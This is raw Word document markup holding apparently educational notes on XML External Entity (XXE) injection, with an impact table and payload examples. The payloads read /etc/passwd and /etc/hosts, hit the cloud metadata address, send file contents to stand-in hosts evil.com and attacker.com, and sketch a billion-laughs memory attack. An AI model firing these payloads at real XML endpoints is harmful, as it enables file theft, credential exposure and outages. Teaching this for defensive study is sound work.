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8A9A" w14:textId="050E4FFC" w:rsidR="000A0952" w:rsidRDefault="000A0952" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="000A0952">
        <w:t>XML External Entity (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD8A67" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML External Entity) Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> is a vulnerability that arises when an XML parser </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>processes user-supplied XML input</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> and allows the inclusion of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>external entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> — typically file paths or remote URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29738542" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>This allows attackers to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCC07C6" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Read local files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615305C1" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Perform SSRF (Server-Side Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49109A40" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bypass firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA5AA0" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DoS the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7369A4" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exfiltrate data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F07B472" w14:textId="4734B7F1" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Where It Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6019D7" w14:textId="2147D376" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> Apps that </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>accept XML input</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> (APIs, SAML, SOAP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC4A51" w14:textId="0F7348C5" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> Libraries that </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parse XML insecurely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4BA68B" w14:textId="34868929" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t xml:space="preserve"> Misconfigured XML parsers that </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resolve external entities by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A751AF" w14:textId="0D6E996E" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Types of XXE Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B2264" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>1. File Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773339FB" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Read files on the server (e.g., /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>/passwd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A373D" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616601B0" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE data [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BB7BF" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4E90F" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6292E258" w14:textId="0F8DDA04" w:rsidR="000A0952" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;data&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;&lt;/data&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A2D263" w14:textId="540DE394" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>SSRF (Server-Side Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BFFFB7" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Force server to connect to internal resource:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://localhost:8080/internal-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C28A79" w14:textId="5057EA2F" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Out-of-Band (OOB) Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F473386" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Exfiltrate file content to attacker server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196E056C" w14:textId="69AEEDD9" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://evil.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>steal?data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE5A5A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=%file;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4D87F" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>4. Denial of Service (Billion Laughs Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E125F5F" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRPr="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Exploit parser recursion with nested entities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195331A5" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY a "HAHA"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A44030" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY b "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a;&amp;a;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>a;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F4295" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;!ENTITY c "&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>b;&amp;b;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>b;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A6A2D" w14:textId="0CEA4378" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1E827" w14:textId="6DEF2DEE" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Causes massive memory exhaustion = crash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ABEF64" w14:textId="78C4021F" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE5A5A">
        <w:t>Impact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4901"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="1F5B7BA8" w14:textId="77777777" w:rsidTr="00F71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19F83" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1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74814C5D" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="5525BD3A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96DA" w14:textId="736A6470" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> Local File Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05DEF33A" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>etc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>/passwd, AWS keys, config files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="6CACE52F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4D03" w14:textId="539C0669" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="626C37FE" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Internal API scanning, cloud metadata access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="3EC28D3E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13B14" w14:textId="23AECF60" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> Sensitive Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA4439C" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Send stolen data to external server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="68A38F99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47A2" w14:textId="04565891" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5415EFF6" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>Exhaust server resources with entity expansion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w14:paraId="787DE53B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DB9D" w14:textId="7F90591C" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t xml:space="preserve"> Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659DF99D" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRPr="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00F71DB1">
              <w:t>In some deserialization chains (rare)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0680E290" w14:textId="77777777" w:rsidR="00BE5A5A" w:rsidRDefault="00BE5A5A" w:rsidP="00BE5A5A"/>
    <w:p w14:paraId="1FDC9386" w14:textId="3D150F22" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:t>Payload Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C24F01" w14:textId="2891DC05" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:t>Read Local File:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D2BC71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>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94308A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>&lt;!DOCTYPE root [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216F0C7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 xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051FE98C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>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7973B" w14:textId="344F5EE0" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;root&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1AF5F" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1"/>
    <w:p w14:paraId="334E572A" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:t>SSRF via Metadata API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBDD029" w14:textId="7C299B99" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://169.254.169.254/latest/meta-data/"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F7289D" w14:textId="41F0A052" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:lastRenderedPageBreak/>
        <w:t>Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF867B1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>&lt;!ENTITY % data SYSTEM "file:///etc/hosts"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AECE40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>&lt;!ENTITY % param "&lt;!ENTITY exfiltrate SYSTEM 'http://attacker.com/?x=%data;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D464331" w14:textId="482B406C" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F71DB1">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>param;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4827651D" w14:textId="77777777" w:rsidR="00F71DB1" w:rsidRDefault="00F71DB1" w:rsidP="00F71DB1">
      <w:pPr>
